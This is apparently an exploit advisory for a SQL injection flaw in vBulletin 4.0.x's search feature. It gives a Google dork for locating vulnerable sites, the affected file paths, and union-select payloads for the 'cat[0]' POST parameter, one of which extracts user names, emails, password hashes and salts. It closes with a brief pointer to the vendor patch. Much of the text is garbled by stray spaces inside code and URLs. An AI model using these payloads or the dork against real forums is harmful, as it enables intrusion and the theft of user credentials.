Version: 4.0.x
Dork: inurl: "search. php? Search_type = 1"
--------------------------
#~ Vulnerable Codes ~ #
--------------------------
/Vb/search/searchtools. php-line 715;
/Packages/vbforum/search/type/socialgroup. php-line ::203;
--------------------------
#~ Exploit ~ #
--------------------------
POST data on "Search Multiple Content Types" => "groups"
& Cat [0] = 1) union select database ()#
& Cat [0] = 1) union select table_name FROM information_schema.tables #
& Cat [0] = 1) union select concat (username, 0x3a, email, 0x3a, password, 0x3a, salt) FROM user WHERE userid = 1 #
More info: http://j0hnx3r.org /? P = 818
Thank my friends from Inj3ct0r Team (1337day.com)
--------------------------
#~ Advice ~ #
--------------------------
Vendor already released a patch on vb #4.1.3.
Update now!
Use HTTP debugger...
Or please watch this video to understand more: http://www.youtube.com/watch? V = fR9RGCqIPkc
---------------------
Fix:
VBulletin 4.X security patch
Http://www.vbulletin.com/forum/showthread.php/376995-vBulletin-4.X-Security-Patch? AID = 804495 & PID = 564936